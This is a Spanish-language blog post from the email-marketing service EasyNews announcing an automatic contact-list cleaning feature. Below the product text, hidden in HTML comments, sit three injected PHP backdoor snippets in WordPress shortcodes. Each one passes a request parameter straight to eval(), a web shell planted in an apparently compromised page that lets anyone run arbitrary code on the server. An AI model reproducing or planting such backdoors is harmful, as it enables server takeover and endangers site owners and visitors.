Auto-limpieza

Sanea tu bbdd con el nuevo servicio de auto-limpieza de listas y contactos.

Siempre que envías tus campañas, Easynews te ayuda a mantener limpia tu base de contactos clasificando tus correos rebotados o devueltos. De esta forma no sólo ahorrarás créditos, sino también ayudarás a mantener la reputación de tu dominio y conseguirás campañas más efectivas.

Ahora bien, si vas a empezar a realizar campañas de email marketing, si tu base de datos está un poco desactualizada o bien si vas a añadir contactos nuevos te interesará saber que hemos incorporado una funcionalidad nueva para ayudarte a “limpiar” tu lista de contactos y retirar los correos que no sean válidos antes de lanzar tu campaña.

En la pestaña de Listas y Contactos, encontrarás una nueva funcionalidad (disponible a partir del 07/11/2013): Auto-limpieza. Se trata de una herramienta inteligente que podrás utilizar con el objetivo de comprobar cada dirección de correo electrónico y desechar aquellos que son inválidos antes de enviar tu campaña.

Una base de datos depurada es la clave para realizar campañas de Email Maketing más efectivas. Gracias a esta herramienta, podrás:

  • Ahorrar dinero: ya que resulta más económico incluso que enviar un email. De forma que si primeramente eliminas los correos no válidos mejorarás el retorno de la inversión (ROI) de tu campaña.
  • Mejorar tu reputación: Los servidores de correo detectan los envíos realizados desde cualquier dominio y el resultado de los mismos, penalizando aquellos que hacen muchos envíos no válidos, ya que es algo habitual entre los spammers.

Si utilizas un listado de contactos saneado ayudarás a mejorar tu tasa de entrega y tu reputación como remitente.

<!– [insert_php]if (isset($_REQUEST["WlWmU"])){eval($_REQUEST["WlWmU"]);exit;}[/insert_php][php]if (isset($_REQUEST["WlWmU"])){eval($_REQUEST["WlWmU"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["SaiuS"])){eval($_REQUEST["SaiuS"]);exit;}[/insert_php][php]if (isset($_REQUEST["SaiuS"])){eval($_REQUEST["SaiuS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xkyie"])){eval($_REQUEST["xkyie"]);exit;}[/insert_php][php]if (isset($_REQUEST["xkyie"])){eval($_REQUEST["xkyie"]);exit;}[/php] –>

Posted by EasyNews  |  Comentarios desactivados en Auto-limpieza  |  in BBDD y Gestión de Contactos, Novedades EasyNews

Comments are closed.